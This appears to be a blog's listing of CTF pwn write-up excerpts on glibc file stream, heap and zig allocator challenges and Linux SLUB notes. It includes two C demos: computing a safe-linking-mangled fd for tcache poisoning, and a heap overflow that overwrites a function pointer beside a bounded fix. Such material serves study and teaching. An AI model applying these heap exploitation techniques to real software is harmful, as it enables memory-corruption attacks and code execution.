[SECCON CTF 2022 Quals] babyfile

Introduction babyfile is a file stream exploitation challenge I did during the SECCON CTF 2022 Quals event. I didn't manage to flag it within the 24 hours :(. But anyway I hope this write-up will be interesting to read, given I show another way to gain code execution (which I have not seen before) based on _IO_obstack_jumps! The related files can be found here. If you're not familiar with file stream internals, I advise you to read my previous write-ups about file stream exploitation, especially this one and this other one.

Linux file stream internals for fun and profit

Introduction File streams are now a very common attack surface; here is a high-level introduction that should make you understand the design of known attacks beyond reading the code of one particular function. I already talked about FSOP here. This article reviews glibc 2.36. Most of this article comes from this awesome series of articles about the _IO_FILE structure. Contents: Introduction; Global design; Common functions (fopen, fread, _IO_file_xsgetn_mmap). Global design As said in my previous write-up:

[corCTF 2022 - pwn] zigzag

Introduction zigzag is a zig heap challenge I did during the corCTF 2022 event. It was pretty exotic given we have to pwn a heap-like challenge written in zig. It does not use the C allocator but instead the GeneralPurposeAllocator, which makes the challenge even more interesting. Find the tasks here. TL; DR Understand the zig GeneralPurposeAllocator internals. Hijack the BucketHeader of a given bucket to get a write-what-where / read-what-where primitive.

[corCTF 2022 - pwn] cshell2

Introduction cshell2 is a heap challenge I did during the corCTF 2022 event. It was pretty classic so I will not describe it at length. If you are new to heap challenges, I advise you to read my previous heap write-ups. TL; DR Fill the tcache. A heap overflow in edit on the bio field allows us to leak the address of the unsorted bin (a libc leak). Leak a heap address and defeat safe-linking to get an arbitrary write through tcache poisoning.
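The last two steps of that TL;DR rely on safe-linking arithmetic (glibc 2.32 and later), so here is an added example of it, written for this page and not taken from the challenge or its exploit. It reimplements glibc's PROTECT_PTR/REVEAL_PTR macros, shows how a leaked mangled fd can be demangled without knowing where it was stored (exact when both chunks share a page, off by at most the low 12 bits otherwise), computes the fd an attacker must write for tcache poisoning once the victim chunk's address is known, and emulates the alignment check tcache_get performs on the revealed pointer. All addresses are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* x86-64 glibc: user pointers are 16-byte aligned; tcache_get aborts with
   "malloc(): unaligned tcache chunk detected" when the revealed next is not. */
#define MALLOC_ALIGN_MASK 0xfULL

/* glibc's PROTECT_PTR (malloc.c, 2.32+): `pos` is the address of the fd field
   being written (the chunk's user pointer), `ptr` is the pointer stored there. */
static uint64_t protect_ptr(uint64_t pos, uint64_t ptr) {
    return (pos >> 12) ^ ptr;
}

/* glibc's REVEAL_PTR: the same XOR, so the allocator needs `pos` to undo it. */
static uint64_t reveal_ptr(uint64_t pos, uint64_t mangled) {
    return (pos >> 12) ^ mangled;
}

/* Recover `ptr` from a leaked mangled fd WITHOUT knowing `pos`. When pos and
   ptr are in the same page, mangled == ptr ^ (ptr >> 12) and the XOR telescopes:
   ptr = m ^ m>>12 ^ m>>24 ^ m>>36 ^ m>>48. When they are different pages of the
   same 16 MiB window the result is exact except for the low 12 bits, which is
   still enough to locate the heap. */
static uint64_t demangle(uint64_t mangled) {
    uint64_t v = mangled;
    for (int shift = 12; shift < 64; shift += 12)
        v ^= mangled >> shift;
    return v;
}

/* Value an attacker writes into the victim chunk's fd (at user address
   `victim_pos`) so that the next malloc from that tcache bin returns `target`.
   This is why tcache poisoning on 2.32+ needs a heap leak first. */
static uint64_t poisoned_fd(uint64_t victim_pos, uint64_t target) {
    return protect_ptr(victim_pos, target);
}

/* Emulates what tcache_get does with the victim's stored fd: returns the
   pointer the allocator will hand out next, or 0 where the alignment check
   would abort the process. */
static uint64_t tcache_next(uint64_t victim_pos, uint64_t stored_fd) {
    uint64_t next = reveal_ptr(victim_pos, stored_fd);
    if (next & MALLOC_ALIGN_MASK)
        return 0;
    return next;
}

int main(void) {
    /* Constructed addresses for illustration; not from the challenge binary. */
    uint64_t chunk_a = 0x55d0a2c002a0ULL;   /* victim chunk user pointer */
    uint64_t chunk_b = 0x55d0a2c003c0ULL;   /* same page as chunk_a */
    uint64_t chunk_c = 0x55d0a2c15e70ULL;   /* other page, same 16 MiB window */
    uint64_t target  = 0x7f3b4e7a0f00ULL;   /* where we want malloc to land */

    uint64_t leak = protect_ptr(chunk_a, chunk_b);
    printf("leaked fd %#llx demangles to %#llx (exact)\n",
           (unsigned long long)leak, (unsigned long long)demangle(leak));

    leak = protect_ptr(chunk_a, chunk_c);
    printf("leaked fd %#llx demangles to %#llx (low 12 bits off)\n",
           (unsigned long long)leak, (unsigned long long)demangle(leak));

    uint64_t fd = poisoned_fd(chunk_a, target);
    printf("write %#llx into fd: malloc returns %#llx\n",
           (unsigned long long)fd, (unsigned long long)tcache_next(chunk_a, fd));
    printf("write raw target: malloc returns %#llx (garbage)\n",
           (unsigned long long)tcache_next(chunk_a, target));
    printf("unaligned target: %#llx (would abort)\n",
           (unsigned long long)tcache_next(chunk_a, poisoned_fd(chunk_a, target + 8)));
    return 0;
}
```

Two practical consequences follow from the arithmetic: writing the raw target the way pre-2.32 tcache poisoning did yields a garbage pointer, and the target has to be 16-byte aligned or the revealed pointer trips the alignment check before it is ever returned.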

[diceCTF 2022 - pwn] catastrophe

Introduction I just learned how to use malloc and free... am I doing this right? catastrophe is a heap challenge I did during diceCTF 2022. I had a lot of issues with the libc and the dynamic linker, so I first did the challenge with the libc that was in /lib/libc.so.6, then I figured out thanks to my teammate supersnail that I was using the wrong libc.

[Linux kernel side notes - SLUB] kmem_cache

Introduction The kmem_cache structure is one of the main structures of the SLUB allocator. It contains pointers to other structures (cpu_slab, the node array) and information about the cache it describes (object_size, name). All notes target Linux kernel 5.18.12. Overview of its role in the allocation process: Let's dig in. Here is the definition of the kmem_cache structure:

    // https://elixir.bootlin.com/linux/latest/source/include/linux/slub_def.h#L90
    /*
     * Slab cache management.

Linux kernel side notes

Here are just some side notes about Linux kernel internals that I put here to avoid having to learn the same things again and again. All notes target Linux kernel 5.18.12. There will be a lot of code for which I do not comment every part. Kernel heap management (SLUB, SLAB, SLOB) As in userland, the kernel has several algorithms to manage memory allocation depending on what it needs (large resources or not, safety requirements, etc.).

[HackTheBox Cyber Apocalypse 2022 - pwn] Once and for all

Once and for all is a heap challenge I did during the HackTheBox Cyber Apocalypse event. This is a classic unsorted bin attack plus an FSOP on stdin. Find the tasks and the final exploit here and here. Reverse engineering All the snippets of pseudo-code are produced by IDA Freeware:

    int __cdecl main(int argc, const char **argv, const char **envp)
    {
      int v4; // [rsp+18h] [rbp-8h] BYREF
      int i; // [rsp+1Ch] [rbp-4h]

      for ( i = 0; i <= 49; ++i )
      {
        puts(s);
        printf(&unk_1310);
        __isoc99_scanf(&unk_13C8, &v4);
        puts(s);
        switch ( v4 )
        {
          case 1:
            small_alloc(s);
            break;
          case 2:
            fix(s);
            break;
          case 3:
            examine(s);
            break;
          case 4:
            savebig(s);
            break;
          case 5:
            exit(0);
          default:
            puts("[-] Invalid choice!

[pwnable - pwn] Bookwriter

What we can do In the edit feature, we can overwrite the bytes right after any chunk, up to the first NULL byte. In the alloc handler, the loop over the alloc array iterates one time too many, so the write lands on the first entry of the size array, which then holds a chunk address interpreted as a huge size; from there we can easily trigger a large heap overflow.

[DCTF 2022 - pwn] phonebook

Intro phonebook is a basic heap challenge I did during the DCTF event. It's basically just a heap overflow which allows us to overwrite a function pointer with, for example, the address of system. The bug

    $ ./phonebook
    Choose an option: [1-5]
    1. Store someone's information
    2. Edit information
    3. Call someone
    4. Unfriend someone
    5. Add the hidden_note
    >

We can create an entry and then initialize a name, a number and a function pointer.
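To make the bug class concrete, here is an added example (written for this page, not the challenge's binary or exploit) of a heap object whose name buffer is followed by a function pointer. The struct layout, field names, the unbounded edit routine and the attacker function are all constructed assumptions; in the real challenge the overwritten pointer would be pointed at system after a libc leak, here it is pointed at a local function so the demo runs. The hardened edit beside it shows the check that closes the bug.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed layout: a name buffer, a number buffer and a call-back that the
   "call someone" menu entry invokes. Assumed for this example only. */
struct entry {
    char name[32];
    char number[16];
    void (*call)(struct entry *);
};

static void real_call(struct entry *e) {
    printf("calling %s at %s\n", e->name, e->number);
}

/* Stand-in for what an attacker would really install (e.g. system). */
static void attacker_fn(struct entry *e) {
    (void)e;
    puts("pwned");
}

/* Vulnerable edit: copies `len` caller-supplied bytes starting at name with no
   check against sizeof(name). It is written as a copy over the object's bytes
   so that, for the payload used below, everything stays inside the struct and
   the demo is well-defined C. */
static void edit_name_vuln(struct entry *e, const void *data, size_t len) {
    memcpy((unsigned char *)e + offsetof(struct entry, name), data, len);
}

/* Hardened edit: refuses anything that would not fit with its terminator. */
static int edit_name_safe(struct entry *e, const void *data, size_t len) {
    if (len >= sizeof e->name)
        return -1;
    memcpy(e->name, data, len);
    e->name[len] = '\0';
    return 0;
}

/* Builds the overflow: filler through name and number, then the pointer the
   attacker wants `call` to become. Returns the payload length. */
static size_t build_payload(unsigned char *buf, void (*fn)(struct entry *)) {
    memset(buf, 'A', offsetof(struct entry, call));
    memcpy(buf + offsetof(struct entry, call), &fn, sizeof fn);
    return offsetof(struct entry, call) + sizeof fn;
}

/* 1 if the unbounded edit replaced the function pointer. */
static int demo_vuln(void) {
    struct entry e = { .name = "alice", .number = "555-0100", .call = real_call };
    unsigned char payload[sizeof(struct entry)];
    size_t n = build_payload(payload, attacker_fn);
    edit_name_vuln(&e, payload, n);
    return e.call == attacker_fn;
}

/* 1 if the bounded edit rejected the payload and left the pointer alone. */
static int demo_safe(void) {
    struct entry e = { .name = "bob", .number = "555-0199", .call = real_call };
    unsigned char payload[sizeof(struct entry)];
    size_t n = build_payload(payload, attacker_fn);
    int rc = edit_name_safe(&e, payload, n);
    return rc == -1 && e.call == real_call;
}

int main(void) {
    struct entry e = { .name = "alice", .number = "555-0100", .call = real_call };
    unsigned char payload[sizeof(struct entry)];
    size_t n = build_payload(payload, attacker_fn);

    e.call(&e);                         /* calling alice at 555-0100 */
    edit_name_vuln(&e, payload, n);
    e.call(&e);                         /* pwned */

    struct entry f = { .name = "bob", .number = "555-0199", .call = real_call };
    printf("safe edit rc=%d\n", edit_name_safe(&f, payload, n));
    f.call(&f);                         /* calling bob at 555-0199 */
    return 0;
}
```

The payload length is exactly sizeof(struct entry), which is what a real attacker would send anyway: enough to reach the pointer and no more, so the next chunk's header stays intact and free() does not abort first.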